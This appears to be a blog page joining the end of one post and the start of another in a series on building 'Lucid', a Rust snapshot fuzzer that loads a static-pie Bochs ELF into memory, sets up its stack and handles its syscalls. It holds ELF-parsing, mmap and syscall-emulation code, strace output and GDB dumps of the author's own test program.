I page align the result and then map that memory during execution context initialization and save the memory address to the execution state. Now at run time in lucid_handler we can save the extended state:

// Determine save logic
    match save_inst {
        SaveInst::XSave64 => {
            // Retrieve XCR0 value, this will serve as our save mask
            let xcr0 = unsafe { _xgetbv(0) } as u64;

            // Call xsave to save the extended state to Bochs save area
            unsafe { _xsave64(save_area as *mut u8, xcr0); }             
        },
        SaveInst::FxSave64 => {
            // Call fxsave to save the extended state to Bochs save area
            unsafe { _fxsave64(save_area as *mut u8); }
        },
        _ => (), // NoSave
    }

Right now, all we’re handling for exit reasons are syscalls, so we invoke our syscall handler and then restore the extended state before returning back to the exit_handler assembly stub:

// Determine what to do based on the exit reason
    match exit_reason {
        BochsExit::Syscall => {
            syscall_handler(context);
        },
    }

    // Restore extended state, determine restore logic
    match save_inst {
        SaveInst::XSave64 => {
            // Retrieve XCR0 value, this will serve as our save mask
            let xcr0 = unsafe { _xgetbv(0) } as u64;

            // Call xrstor to restore the extended state from Bochs save area
            unsafe { _xrstor64(save_area as *const u8, xcr0); }             
        },
        SaveInst::FxSave64 => {
            // Call fxrstor to restore the extended state from Bochs save area
            unsafe { _fxrstor64(save_area as *const u8); }
        },
        _ => (), // NoSave
    }

Let’s see how we handle syscalls.

Implementing Syscalls

When we run the test program normally, not under Lucid, we get the following output:

Argument count: 1
Args:
   -./test
Test alive!
Test alive!
Test alive!
Test alive!
Test alive!
g_lucid_ctx: 0

And when we run it with strace, we can see what syscalls are made:

execve("./test", ["./test"], 0x7ffca76fee90 /* 49 vars */) = 0
arch_prctl(ARCH_SET_FS, 0x7fd53887f5b8) = 0
set_tid_address(0x7fd53887f7a8)         = 850649
ioctl(1, TIOCGWINSZ, {ws_row=40, ws_col=110, ws_xpixel=0, ws_ypixel=0}) = 0
writev(1, [{iov_base="Argument count: 1", iov_len=17}, {iov_base="\n", iov_len=1}], 2Argument count: 1
) = 18
writev(1, [{iov_base="Args:", iov_len=5}, {iov_base="\n", iov_len=1}], 2Args:
) = 6
writev(1, [{iov_base="   -./test", iov_len=10}, {iov_base="\n", iov_len=1}], 2   -./test
) = 11
writev(1, [{iov_base="Test alive!", iov_len=11}, {iov_base="\n", iov_len=1}], 2Test alive!
) = 12
nanosleep({tv_sec=1, tv_nsec=0}, 0x7ffc2fb55470) = 0
writev(1, [{iov_base="Test alive!", iov_len=11}, {iov_base="\n", iov_len=1}], 2Test alive!
) = 12
nanosleep({tv_sec=1, tv_nsec=0}, 0x7ffc2fb55470) = 0
writev(1, [{iov_base="Test alive!", iov_len=11}, {iov_base="\n", iov_len=1}], 2Test alive!
) = 12
nanosleep({tv_sec=1, tv_nsec=0}, 0x7ffc2fb55470) = 0
writev(1, [{iov_base="Test alive!", iov_len=11}, {iov_base="\n", iov_len=1}], 2Test alive!
) = 12
nanosleep({tv_sec=1, tv_nsec=0}, 0x7ffc2fb55470) = 0
writev(1, [{iov_base="Test alive!", iov_len=11}, {iov_base="\n", iov_len=1}], 2Test alive!
) = 12
nanosleep({tv_sec=1, tv_nsec=0}, 0x7ffc2fb55470) = 0
writev(1, [{iov_base="g_lucid_ctx: 0", iov_len=14}, {iov_base="\n", iov_len=1}], 2g_lucid_ctx: 0
) = 15
exit_group(0)                           = ?
+++ exited with 0 +++

We see that the first two syscalls are involved with process creation, we don’t need to worry about those our process is already created and loaded in memory. The other syscalls are ones we’ll need to handle, things like set_tid_address, ioctl, and writev. We don’t worry about exit_group yet as that will be a fatal exit condition because Bochs shouldn’t exit if we’re snapshot fuzzing.

So we can use our saved register bank information to extract the syscall number from eax and dispatch to the appropriate syscall function! You can see that logic here:

// This is where we process Bochs making a syscall. All we need is a pointer to
// the execution context, and we can then access the register bank and all the
// peripheral structures we need
#[allow(unused_variables)]
pub fn syscall_handler(context: *mut LucidContext) {
    // Get a handle to the register bank
    let bank = LucidContext::get_register_bank(context);

    // Check what the syscall number is
    let syscall_no = (*bank).rax;

    // Get the syscall arguments
    let arg1 = (*bank).rdi;
    let arg2 = (*bank).rsi;
    let arg3 = (*bank).rdx;
    let arg4 = (*bank).r10;
    let arg5 = (*bank).r8;
    let arg6 = (*bank).r9;

    match syscall_no {
        // ioctl
        0x10 => {
            //println!("Handling ioctl()...");
            // Make sure the fd is 1, that's all we handle right now?
            if arg1 != 1 {
                println!("Invalid `ioctl` fd: {}", arg1);
                fatal_exit();
            }

            // Check the `cmd` argument
            match arg2 as u64 {
                // Requesting window size
                libc::TIOCGWINSZ => {   
                    // Arg 3 is a pointer to a struct winsize
                    let winsize_p = arg3 as *mut libc::winsize;

                    // If it's NULL, return an error, we don't set errno yet
                    // that's a weird problem
                    // TODO: figure out that whole TLS issue yikes
                    if winsize_p.is_null() {
                        (*bank).rax = usize::MAX;
                        return;
                    }

                    // Deref the raw pointer
                    let winsize = unsafe { &mut *winsize_p };

                    // Set to some constants
                    winsize.ws_row      = WS_ROW;
                    winsize.ws_col      = WS_COL;
                    winsize.ws_xpixel   = WS_XPIXEL;
                    winsize.ws_ypixel   = WS_YPIXEL;

                    // Return success
                    (*bank).rax = 0;
                },
                _ => {
                    println!("Unhandled `ioctl` argument: 0x{:X}", arg1);
                    fatal_exit();
                }
            }
        },
        // writev
        0x14 => {
            //println!("Handling writev()...");
            // Get the fd
            let fd = arg1 as libc::c_int;

            // Make sure it's an fd we handle
            if fd != STDOUT {
                println!("Unhandled writev fd: {}", fd);
            }

            // An accumulator that we return
            let mut bytes_written = 0;

            // Get the iovec count
            let iovcnt = arg3 as libc::c_int;

            // Get the pointer to the iovec
            let mut iovec_p = arg2 as *const libc::iovec;

            // If the pointer was NULL, just return error
            if iovec_p.is_null() {
                (*bank).rax = usize::MAX;
                return;
            }

            // Iterate through the iovecs and write the contents
            green!();
            for i in 0..iovcnt {
                bytes_written += write_iovec(iovec_p);

                // Update iovec_p
                iovec_p = unsafe { iovec_p.offset(1 + i as isize) };
            }
            clear!();

            // Update return value
            (*bank).rax = bytes_written;
        },
        // nanosleep
        0x23 => {
            //println!("Handling nanosleep()...");
            (*bank).rax = 0;
        },
        // set_tid_address
        0xDA => {
            //println!("Handling set_tid_address()...");
            // Just return Boch's pid, no need to do anything
            (*bank).rax = BOCHS_PID as usize;
        },
        _ => {
            println!("Unhandled Syscall Number: 0x{:X}", syscall_no);
            fatal_exit();
        }
    }
}

That’s about it! It’s kind of fun acting as the kernel. Right now our test program doesn’t do much, but I bet we’re going to have to figure out how to deal with things like files and such when using Bochs, but that’s a different time. Now all there is to do, after setting the return code via rax, is return back to the exit_handler stub and back to Bochs gracefully.

Returning Gracefully

    // Restore the flags
    "popfq",

    // Restore the GPRS
    "mov rax, [r13 + 0x0]",
    "mov rbx, [r13 + 0x8]",
    "mov rcx, [r13 + 0x10]",
    "mov rdx, [r13 + 0x18]",
    "mov rsi, [r13 + 0x20]",
    "mov rdi, [r13 + 0x28]",
    "mov rbp, [r13 + 0x30]",
    "mov rsp, [r13 + 0x38]",
    "mov r8, [r13 + 0x40]",
    "mov r9, [r13 + 0x48]",
    "mov r10, [r13 + 0x50]",
    "mov r11, [r13 + 0x58]",
    "mov r12, [r13 + 0x60]",
    "mov r13, [r13 + 0x68]",
    "mov r14, [r13 + 0x70]",
    "mov r15, [r13 + 0x78]",

    // Return execution back to Bochs!
    "ret"

We restore the CPU flags, restore the general purpose registers, and then we simple ret like we’re done with the function call. Don’t forget we already restored the extended state before within lucid_context before returning from that function.

Conclusion

And just like that, we have an infrastructure that is capable of handling context switches from Bochs to the fuzzer. It will no doubt change and need to be refactored, but the ideas will remain similar. We can see the output below demonstrates the test program running under Lucid with us handling the syscalls ourselves:

[08:15:56] lucid> Loading Bochs...
[08:15:56] lucid> Bochs mapping: 0x10000 - 0x18000
[08:15:56] lucid> Bochs mapping size: 0x8000
[08:15:56] lucid> Bochs stack: 0x7F8A50FCF000
[08:15:56] lucid> Bochs entry: 0x11058
[08:15:56] lucid> Creating Bochs execution context...
[08:15:56] lucid> Starting Bochs...
Argument count: 4
Args:
   -./bochs
   -lmfao
   -hahahah
   -yes!
Test alive!
Test alive!
Test alive!
Test alive!
Test alive!
g_lucid_ctx: 0x55f27f693cd0
Unhandled Syscall Number: 0xE7

Next Up?

Next we will compile Bochs against Musl and work on getting it to work. We’ll need to implement all of its syscalls as well as get it running a test target that we’ll want to snapshot and run over and over. So the next blogpost should be a Bochs that is syscall-sandboxed snapshotting and rerunning a hello world type target. Until then!

Fuzzer Development 1: The Soul of a New Machine

The Human Machine Interface

h0mbre

4 November 2023 at 04:00

Introduction && Credit to Gamozolabs

For a long time I’ve wanted to develop a fuzzer on the blog during my weekends and freetime, but for one reason or another, I could never really conceptualize a project that would be not only worthwhile as an educational tool, but also offer some utility to the fuzzing community in general. Recently, for Linux Kernel exploitation reasons, I’ve been very interested in Nyx. Nyx is a KVM-based hypervisor fuzzer that you can use to snapshot fuzz traditionally hard to fuzz targets. A lot of the time (most of the time?), we want to fuzz things that don’t naturally lend themselves well to traditional fuzzing approaches. When faced with target complexity in fuzzing (leaving input generation and nuance aside for now), there have generally been two approaches.

One approach is to lobotomize the target such that you can isolate a small subset of the target that you find “interesting” and only fuzz that. That can look like a lot of things, such as ripping a small portion of a Kernel subsystem out of the kernel and compiling it into a userland application that can be fuzzed with traditional fuzzing tools. This could also look like taking an input parsing routine out of a Web Browser and fuzzing just the parsing logic. This approach has its limits though, in an ideal world, we want to fuzz anything that may come in contact with or be affected by the artifacts of this “interesting” target logic. This lobotomy approach is reducing the amount of target state we can explore to a large degree. Imagine if the hypothetical parsing routine successfully produces a data structure that is later consumed by separate target logic that actually reveals a bug. This fuzzing approach fails to explore that possibility.

Another approach, is to effectively sandbox your target in such a way that you can exert some control over its execution environment and fuzz the target in its entirety. This is the approach that fuzzers like Nyx take. By snapshot fuzzing an entire Virtual Machine, we are able to fuzz complex targets such as a Web Browser or Kernel in a way that we are able to explore much more state. Nyx provides us with a way to snapshot fuzz an entire Virtual Machine/system. This is, in my opinion, the ideal way to fuzz things because you are drastically closing the gap between a contrived fuzzing environment and how the target applications exist in the “real-world”. Now obviously there are tradeoffs here, one being the complexity of the fuzzing tooling itself. But, I think given the propensity of complex native code applications to harbor infinite bugs, the manual labor and complexity are worth it in order to increase the bug-finding potential of our fuzzing workflow.

And so, in my pursuit of understanding how Nyx works so that I could build a fuzzer ontop of it, I revisited gamozolabs (Brandon Falk’s) stream paper review he did on the Nyx paper. It’s a great stream, the Nyx authors were present in Twitch chat and so there were some good back and forths and the stream really highlights what an amazing utility Nyx is for fuzzing. But something else besides Nyx piqued my interest during the stream! During the stream, Gamozo described a fuzzing architecture he had previously built that utilized the Bochs emulator to snapshot fuzz complex targets and entire systems. This architecture sounded extremely interesting and clever to me, and coincidentally it had several attributes in common with a sandboxing utility I had been designing with a friend for fuzzing as well.

This fuzzing architecture seemed to meet several criteria that I personally value when it comes to doing a fuzzer development project on the blog:

it is relatively simple in its design,
it allows for almost endless introspection utilities to be added,
it lends itself well to iterative development cycles,
it can scale and be used on my servers I bought for fuzzing (but haven’t used yet because I don’t have a fuzzer!),
it can fuzz the Linux Kernel,
it can fuzz userland and kernel components on other OSes and platforms (Windows, MacOS),
it is pretty unique in its design compared to open source fuzzing tools that exist,
it can be designed from scratch to work well with existing flexible tooling such as LibAFL,
there is no source code available anywhere publicly, so I’m free to implement it from scratch the way I see fit,
it can be made to be portable, ie, there is nothing stopping us for running this fuzzer on Windows instead of just Linux,
it will allow me to do a lot of learning and low-level computing research and learning.

So all things considered, this seemed like the ideal project to implement on the blog and so I reached out to Gamozo to make sure he’d be ok with it as I didn’t want to be seen as clout chasing off of his ideas and he was very charitable and encouraged me to do it. So huge thanks to Gamozo for sharing so much content and we’re off to developing the fuzzer.

Also huge shoutout to @is_eqv and @ms_s3c at least two of the Nyx authors who are always super friendly and charitable with their time/answering questions. Some great people to have around.

Another huge shoutout to @Kharosx0 for helping me understand Bochs and for answering all my questions about my design intentions, another very charitable person who is always helping out on the Fuzzing discord.

Misc

Please let me know if you find any programming errors or have some nitpicks with the code. I’ve tried to heavily comment everything, and given that I cobbled this together over the course of a couple of weekends, there are probably some issues with the code. I also haven’t really fleshed out how the repository will look, or what files will be called, or anything like that so please be patient with the code-quality. This is mostly for learning purposes and at this point it is just a proof-of-concept of loading Bochs into memory to explain the first portion of the architecture.

I’ve decided to name the project “Lucid” for now, as reference to lucid dreaming since our fuzz target is in somewhat of a dream state being executed within a simulator.

Bochs

What is Bochs? Good question. Bochs is an x86 full-system emulator capable of running an entire operating system with software-simulated hardware devices. In short, it’s a JIT-less, smaller, less-complex emulation tool similar to QEMU but with way less use-cases and way less performant. Instead of taking QEMU’s approach of “let’s emulate anything and everything and do it with good performance”, Bochs has taken the approach of “let’s emulate an entire x86 system 100% in software without worrying about performance for the most part. This approach has its obvious drawbacks, but if you are only interested in running x86 systems, Bochs is a great utility. We are going to use Bochs as the target execution engine in our fuzzer. Our target code will run inside Bochs. So if we are fuzzing the Linux Kernel for instance, that kernel will live and execute inside Bochs. Bochs is written in C++ and apparently still maintained, but do not expect much code changes or rapid development, the last release was over 2 years ago.

Fuzzer Architecture

This is where we discuss how the fuzzer will be designed according to the information laid out on stream by Gamozo. In simple terms, we will create a “fuzzer” process, which will execute Bochs, which in turn is executing our fuzz target. Instead of snapshotting and restoring our target each fuzzing iteration, we will reset Bochs which contains the target and all of the target system’s simulated state. By snapshotting and restoring Bochs, we are snapshotting and restoring our target.

Going a bit deeper, this setup requires us to sandbox Bochs and run it inside of our “fuzzer” process. In an effort to isolate Bochs from the user’s OS and Kernel, we will sandbox Bochs so that it cannot interact with our operating system. This allows us to achieve a few things, but chiefly this should make Bochs deterministic. As Gamozo explains on stream, isolating Bochs from the operating system, prevents Bochs from accessing any random/randomish data sources. This means that we will prevent Bochs from making syscalls into the kernel as well as executing any instructions that retrieve hardware-sourced data such as CPUID or something similar. I actually haven’t given much thought to the latter yet, but syscalls I have a plan for. With Bochs isolated from the operating system, we can expect it to behave the same way each fuzzing iteration. Given Fuzzing Input A, Bochs should execute exactly the same way for 1 trillion successive iterations.

Secondly, it also means that the entirety of Bochs’ state will be contained within our sandbox, which should enable us to reset Bochs’ state more easily instead of it being a remote process. In a paradigm where Bochs executes as intended as a normal Linux process for example, resetting its state is not trivial and may require a heavy handed approach such as page table walking in the kernel for each fuzzing iteration or something even worse.

So in general, this is how our fuzzing setup should look: Fuzzer Architecture

In order to provide a sandboxed environment, we must load an executable Bochs image into our own fuzzer process. So for this, I’ve chosen to build Bochs as an ELF and then load the ELF into my fuzzer process in memory. Let’s dive into how that has been accomplished thus far.

Loading an ELF in Memory

So in order to make this portion of loading Bochs in memory in the most simplistic way possible, I’ve chosen to compile Bochs as a -static-pie ELF. Now this means that the built ELF has no expectations about where it is loaded. In its _start routine, it actually has all of the logic of the normal OS ELF loader necessary to perform all of its own relocations. How cool is that? But before we get too far ahead of ourselves, the first goal will just be to simply build and load a -static-pie test program and make sure we can do that correctly.

In order to make sure we have everything correctly implemented, we’ll make sure that the test program can correctly access any command line arguments we pass and can execute and exit.

#include <stdio.h>
#include <unistd.h>

int main(int argc, char *argv[]) {
    printf("Argument count: %d\n", argc);
    printf("Args:\n");
    for (int i = 0; i < argc; i++) {
        printf("   -%s\n", argv[i]);
    }

    size_t iters = 0;
    while (1) {
        printf("Test alive!\n");
        sleep(1);
        iters++;

        if (iters > 5) { return 0; }
    }
}

Remember, at this point we don’t sandbox our loaded program at all, all we’re trying to do at this point is load it in our fuzzer virtual address space and jump to it and make sure the stack and everything is correctly setup. So we could run into issues that aren’t real issues if we jump straight into executing Bochs at this point.

So compiling the test program and examining it with readelf -l, we can see that there is actually a DYNAMIC segment. Likely because of the relocations that need to be performed during the aforementioned _start routine.

dude@lol:~/lucid$ gcc test.c -o test -static-pie
dude@lol:~/lucid$ file test
test: ELF 64-bit LSB shared object, x86-64, version 1 (GNU/Linux), dynamically linked, BuildID[sha1]=6fca6026edb756fa32c966844b29529d579e83b9, for GNU/Linux 3.2.0, not stripped
dude@lol:~/lucid$ readelf -l test

Elf file type is DYN (Shared object file)
Entry point 0x9f50
There are 12 program headers, starting at offset 64

Program Headers:
  Type           Offset             VirtAddr           PhysAddr
                 FileSiz            MemSiz              Flags  Align
  LOAD           0x0000000000000000 0x0000000000000000 0x0000000000000000
                 0x0000000000008158 0x0000000000008158  R      0x1000
  LOAD           0x0000000000009000 0x0000000000009000 0x0000000000009000
                 0x0000000000094d01 0x0000000000094d01  R E    0x1000
  LOAD           0x000000000009e000 0x000000000009e000 0x000000000009e000
                 0x00000000000285e0 0x00000000000285e0  R      0x1000
  LOAD           0x00000000000c6de0 0x00000000000c7de0 0x00000000000c7de0
                 0x0000000000005350 0x0000000000006a80  RW     0x1000
  DYNAMIC        0x00000000000c9c18 0x00000000000cac18 0x00000000000cac18
                 0x00000000000001b0 0x00000000000001b0  RW     0x8
  NOTE           0x00000000000002e0 0x00000000000002e0 0x00000000000002e0
                 0x0000000000000020 0x0000000000000020  R      0x8
  NOTE           0x0000000000000300 0x0000000000000300 0x0000000000000300
                 0x0000000000000044 0x0000000000000044  R      0x4
  TLS            0x00000000000c6de0 0x00000000000c7de0 0x00000000000c7de0
                 0x0000000000000020 0x0000000000000060  R      0x8
  GNU_PROPERTY   0x00000000000002e0 0x00000000000002e0 0x00000000000002e0
                 0x0000000000000020 0x0000000000000020  R      0x8
  GNU_EH_FRAME   0x00000000000ba110 0x00000000000ba110 0x00000000000ba110
                 0x0000000000001cbc 0x0000000000001cbc  R      0x4
  GNU_STACK      0x0000000000000000 0x0000000000000000 0x0000000000000000
                 0x0000000000000000 0x0000000000000000  RW     0x10
  GNU_RELRO      0x00000000000c6de0 0x00000000000c7de0 0x00000000000c7de0
                 0x0000000000003220 0x0000000000003220  R      0x1

 Section to Segment mapping:
  Segment Sections...
   00     .note.gnu.property .note.gnu.build-id .note.ABI-tag .gnu.hash .dynsym .dynstr .rela.dyn .rela.plt 
   01     .init .plt .plt.got .plt.sec .text __libc_freeres_fn .fini 
   02     .rodata .stapsdt.base .eh_frame_hdr .eh_frame .gcc_except_table 
   03     .tdata .init_array .fini_array .data.rel.ro .dynamic .got .data __libc_subfreeres __libc_IO_vtables __libc_atexit .bss __libc_freeres_ptrs 
   04     .dynamic 
   05     .note.gnu.property 
   06     .note.gnu.build-id .note.ABI-tag 
   07     .tdata .tbss 
   08     .note.gnu.property 
   09     .eh_frame_hdr 
   10     
   11     .tdata .init_array .fini_array .data.rel.ro .dynamic .got

So what portions of the this ELF image do we actually care about for our loading purposes? We probably don’t need most of this information to simply get the ELF loaded and running. At first, I didn’t know what I needed so I just parsed all of the ELF headers.

Keeping in mind that this ELF parsing code doesn’t need to be robust, because we are only using it to parse and load our own executable, I simply made sure that there were no glaring issues in the built executable when parsing the various headers.

ELF Headers

I’ve written ELF parsing code before, but didn’t really remember how it worked so I had to relearn everything from Wikipedia: https://en.wikipedia.org/wiki/Executable_and_Linkable_Format. Luckily, we’re not trying to parse an arbitrary ELF, just a 64-bit ELF that we built ourselves. The goal is to create a data-structure out of the ELF header information that gives us the data we need to load the ELF in memory. So I skipped some of the ELF header values but ended up parsing the ELF header into the following data structure:

// Constituent parts of the Elf
#[derive(Debug)]
pub struct ElfHeader {
    pub entry: u64,
    pub phoff: u64,
    pub shoff: u64,
    pub phentsize: u16,
    pub phnum: u16,
    pub shentsize: u16,
    pub shnum: u16,
    pub shrstrndx: u16,
}

We really care about a few of these struct members. For one, we definitely need to know the entry, this is where you’re supposed to start executing from. So eventually, our code will jump to this address to start executing the test program. We also care about phoff. This is the offset into the ELF where we can find the base of the Program Header table. This is just an array of Program Headers basically. Along with phoff, we also need to know the number of entries in that array and the size of each entry so that we can parse them. That is where phnum and phentsize come in handy respectively. Given the offset of index 0 in the array, the number of array members, and the size of each member, we can parse the Program Headers.

A single program header, ie, a single entry in the array, can be synthesized into the following data structure:

#[derive(Debug)]
pub struct ProgramHeader {
    pub typ: u32,
    pub flags: u32,
    pub offset: u64,
    pub vaddr: u64,
    pub paddr: u64,
    pub filesz: u64,
    pub memsz: u64,
    pub align: u64, 
}

These program headers describe segments in the ELF image as it should exist in memory. In particular, we care about the loadable segments with type LOAD, as these segments are the ones we have to account for when loading the ELF image. Take our readelf output for example:

Program Headers:
  Type           Offset             VirtAddr           PhysAddr
                 FileSiz            MemSiz              Flags  Align
  LOAD           0x0000000000000000 0x0000000000000000 0x0000000000000000
                 0x0000000000008158 0x0000000000008158  R      0x1000
  LOAD           0x0000000000009000 0x0000000000009000 0x0000000000009000
                 0x0000000000094d01 0x0000000000094d01  R E    0x1000
  LOAD           0x000000000009e000 0x000000000009e000 0x000000000009e000
                 0x00000000000285e0 0x00000000000285e0  R      0x1000
  LOAD           0x00000000000c6de0 0x00000000000c7de0 0x00000000000c7de0
                 0x0000000000005350 0x0000000000006a80  RW     0x1000

We can see that there are 4 loadable segments. They also have several attributes we need to be keeping track of:

Flags describes the memory permissions this segment should have, we have 3 distinct memory protection schemes READ, READ | EXECUTE, and READ | WRITE
Offset describes how far into the physical file contents we can expect to find this segment
PhysAddr we don’t much care about
VirtAddr the virtual address this segment should be loaded at, you can tell that the first segment value for this is 0x0000000000000000 which means that it has no expectations about where it’s to be loaded.
MemSiz how large the segment should be in virtual memory
Align how to align the segments in virtual memory

For our very simplistic use-case of only loading a -static-pie ELF that we ourselves create, we can basically ignore all the other portions of the parsed ELF.

Loading the ELF

Now that we’ve successfully parsed out the relevant attributes of the ELF file, we can create an executable image in memory. For now, I’ve chosen to only implement what’s needed in a Linux environment, but there’s no reason why we couldn’t load this ELF into our memory if we happened to be a Windows userland process. That’s kind of why this whole design is cool. At some point, maybe someone will want Windows support and we’ll add it.

The first thing we need to do, is calculate the size of the virtual memory that we need in order to load the ELF based on the combined size of the segments that are marked LOAD. We also have to keep in mind that there is some padding after the segments that aren’t page aligned, so to do this, I used the following logic:

// Read the executable file into memory
let data = read(BOCHS_IMAGE).map_err(|_| LucidErr::from(
    "Unable to read binary data from Bochs binary"))?;

// Parse ELF 
let elf = parse_elf(&data)?;

// We need to iterate through all of the loadable program headers and 
// determine the size of the address range we need
let mut mapping_size: usize = 0;
for ph in elf.program_headers.iter() {
    if ph.is_load() {
        let end_addr = (ph.vaddr + ph.memsz) as usize;
        if mapping_size < end_addr { mapping_size = end_addr; }
    }
}

// Round the mapping up to a page
if mapping_size % PAGE_SIZE > 0 {
    mapping_size += PAGE_SIZE - (mapping_size % PAGE_SIZE);
}

We iterate through all of the Program Headers in the parsed ELF, and we just see where the largest “end_addr” is. This accounts for the page-aligning padding in between segments as well. And as you can see, we also page-align the last segment as well by making sure that the size is rounded up to the nearest page. At this point we know how much memory we need to mmap to hold the loadable ELF segments. We mmap a contiguous range of memory here:

// Call `mmap` to map memory into our process to hold all of the loadable 
// program header contents in a contiguous range. Right now the perms will be
// generic across the entire range as PROT_WRITE,
// later we'll go back and `mprotect` them appropriately
fn initial_mmap(size: usize) -> Result<usize, LucidErr> {
    // We don't want to specify a fixed address
    let addr = LOAD_TARGET as *mut libc::c_void;

    // Length is straight forward
    let length = size as libc::size_t;

    // Set the protections for now to writable
    let prot = libc::PROT_WRITE;

    // Set the flags, this is anonymous memory
    let flags = libc::MAP_ANONYMOUS | libc::MAP_PRIVATE;

    // We don't have a file to map, so this is -1
    let fd = -1 as libc::c_int;

    // We don't specify an offset 
    let offset = 0 as libc::off_t;

    // Call `mmap` and make sure it succeeds
    let result = unsafe {
        libc::mmap(
            addr,
            length,
            prot,
            flags,
            fd,
            offset
        )
    };

    if result == libc::MAP_FAILED {
        return Err(LucidErr::from("Failed to `mmap` memory for Bochs"));
    }

    Ok(result as usize)
}

So now we have carved out enough memory to write the loadable segments to. The segment data is sourced from the file of course, and so the first thing we do is once again iterate through the Program Headers and extract all the relevant data we need to do a memcpy from the file data in memory, to the carved out memory we just created. You can see that logic here:

let mut load_segments = Vec::new();
    for ph in elf.program_headers.iter() {
        if ph.is_load() {
            load_segments.push((
                ph.flags,               // segment.0
                ph.vaddr    as usize,   // segment.1
                ph.memsz    as usize,   // segment.2
                ph.offset   as usize,   // segment.3
                ph.filesz   as usize,   // segment.4
            ));
        }
    }

After the segment metadata has been extracted, we can copy the contents over as well as call mprotect on the segment in memory so that its permissions perfectly match the Flags segment metadata we discussed earlier. That logic is here:

// Iterate through the loadable segments and change their perms and then 
// copy the data over
for segment in load_segments.iter() {
    // Copy the binary data over, the destination is where in our process
    // memory we're copying the binary data to. The source is where we copy
    // from, this is going to be an offset into the binary data in the file,
    // len is going to be how much binary data is in the file, that's filesz 
    // This is going to be unsafe no matter what
    let len = segment.4;
    let dst = (addr + segment.1) as *mut u8;
    let src = (elf.data[segment.3..segment.3 + len]).as_ptr();

    unsafe {
        std::ptr::copy_nonoverlapping(src, dst, len);
    }

    // Calculate the `mprotect` address by adding the mmap address plus the
    // virtual address offset, we also mask off the last 0x1000 bytes so 
    // that we are always page-aligned as required by `mprotect`
    let mprotect_addr = ((addr + segment.1) & !(PAGE_SIZE - 1))
        as *mut libc::c_void;

    // Get the length
    let mprotect_len = segment.2 as libc::size_t;

    // Get the protection
    let mut mprotect_prot = 0 as libc::c_int;
    if segment.0 & 0x1 == 0x1 { mprotect_prot |= libc::PROT_EXEC; }
    if segment.0 & 0x2 == 0x2 { mprotect_prot |= libc::PROT_WRITE; }
    if segment.0 & 0x4 == 0x4 { mprotect_prot |= libc::PROT_READ; }

    // Call `mprotect` to change the mapping perms
    let result = unsafe {
        libc::mprotect(
            mprotect_addr,
            mprotect_len,
            mprotect_prot
        )
    };

    if result < 0 {
        return Err(LucidErr::from("Failed to `mprotect` memory for Bochs"));
    }
}

After that is successful, our ELF image is basically complete. We can just jump to it and start executing! Just kidding, we have to first setup a stack for the new “process” which I learned was a huge pain.

Setting Up a Stack for Bochs

I spent a lot of time on this and there actually might still be bugs! This was the hardest part I’d say as everything else was pretty much straightforward. To complete this part, I heavily leaned on this resource which describes how x86 32-bit application stacks are fabricated: https://articles.manugarg.com/aboutelfauxiliaryvectors.

Here is an extremely useful diagram describing the 32-bit stack cribbed from the linked resource above:

position            content                     size (bytes) + comment
  ------------------------------------------------------------------------
  stack pointer ->  [ argc = number of args ]     4
                    [ argv[0] (pointer) ]         4   (program name)
                    [ argv[1] (pointer) ]         4
                    [ argv[..] (pointer) ]        4 * x
                    [ argv[n - 1] (pointer) ]     4
                    [ argv[n] (pointer) ]         4   (= NULL)

                    [ envp[0] (pointer) ]         4
                    [ envp[1] (pointer) ]         4
                    [ envp[..] (pointer) ]        4
                    [ envp[term] (pointer) ]      4   (= NULL)

                    [ auxv[0] (Elf32_auxv_t) ]    8
                    [ auxv[1] (Elf32_auxv_t) ]    8
                    [ auxv[..] (Elf32_auxv_t) ]   8
                    [ auxv[term] (Elf32_auxv_t) ] 8   (= AT_NULL vector)

                    [ padding ]                   0 - 16

                    [ argument ASCIIZ strings ]   >= 0
                    [ environment ASCIIZ str. ]   >= 0

  (0xbffffffc)      [ end marker ]                4   (= NULL)

  (0xc0000000)      < bottom of stack >           0   (virtual)
  ------------------------------------------------------------------------

When we pass arguments to a process on the command line like ls / -laht, the Linux OS has to load the ls ELF into memory and create its environment. In this example, we passed a couple argument values to the process as well / and -laht. The way that the OS passes these arguments to the process is on the stack via the argument vector or argv for short, which is an array of string pointers. The number of arguments is represented by the argument count or argc. The first member of argv is usually the name of the executable that was passed on the command line, so in our example it would be ls. As you can see the first thing on the stack, the top of the stack, which is at the lower end of the address range of the stack, is argc, followed by all the pointers to string data representing the program arguments. It is also important to note that the array is NULL terminated at the end.

After that, we have a similar data structure with the envp array, which is an array of pointers to string data representing environment variables. You can retrieve this data yourself by running a program under GDB and using the command show environment, the environment variables are usually in the form “KEY=VALUE”, for instance on my machine the key-value pair for the language environment variable is "LANG=en_US.UTF-8". For our purposes, we can ignore the environment variables. This vector is also NULL terminated.

Next, is the auxiliary vector, which is extremely important to us. This information details several aspects of the program. These auxiliary entries in the vector are 16-bytes a piece. They comprise a key and a value just like our environment variable entries, but these are basically u64 values. For the test program, we can actually dump the auxiliary information by using info aux under GDB.

gef➤  info aux
33   AT_SYSINFO_EHDR      System-supplied DSO's ELF header 0x7ffff7f2e000
51   ???                                                 0xe30
16   AT_HWCAP             Machine-dependent CPU capability hints 0x1f8bfbff
6    AT_PAGESZ            System page size               4096
17   AT_CLKTCK            Frequency of times()           100
3    AT_PHDR              Program headers for program    0x7ffff7f30040
4    AT_PHENT             Size of program header entry   56
5    AT_PHNUM             Number of program headers      12
7    AT_BASE              Base address of interpreter    0x0
8    AT_FLAGS             Flags                          0x0
9    AT_ENTRY             Entry point of program         0x7ffff7f39f50
11   AT_UID               Real user ID                   1000
12   AT_EUID              Effective user ID              1000
13   AT_GID               Real group ID                  1000
14   AT_EGID              Effective group ID             1000
23   AT_SECURE            Boolean, was exec setuid-like? 0
25   AT_RANDOM            Address of 16 random bytes     0x7fffffffe3b9
26   AT_HWCAP2            Extension of AT_HWCAP          0x2
31   AT_EXECFN            File name of executable        0x7fffffffefe2 "/home/dude/lucid/test"
15   AT_PLATFORM          String identifying platform    0x7fffffffe3c9 "x86_64"
0    AT_NULL              End of vector                  0x0

The keys are on the left the values are on the right. For instance, on the stack we can expect the value 0x5 for AT_PHNUM, which describes the number of Program Headers, to be accompanied by 12 as the value. We can dump the stack and see this in action as well.

gef➤  x/400gx $rsp
0x7fffffffe0b0:	0x0000000000000001	0x00007fffffffe3d6
0x7fffffffe0c0:	0x0000000000000000	0x00007fffffffe3ec
0x7fffffffe0d0:	0x00007fffffffe3fc	0x00007fffffffe44e
0x7fffffffe0e0:	0x00007fffffffe461	0x00007fffffffe475
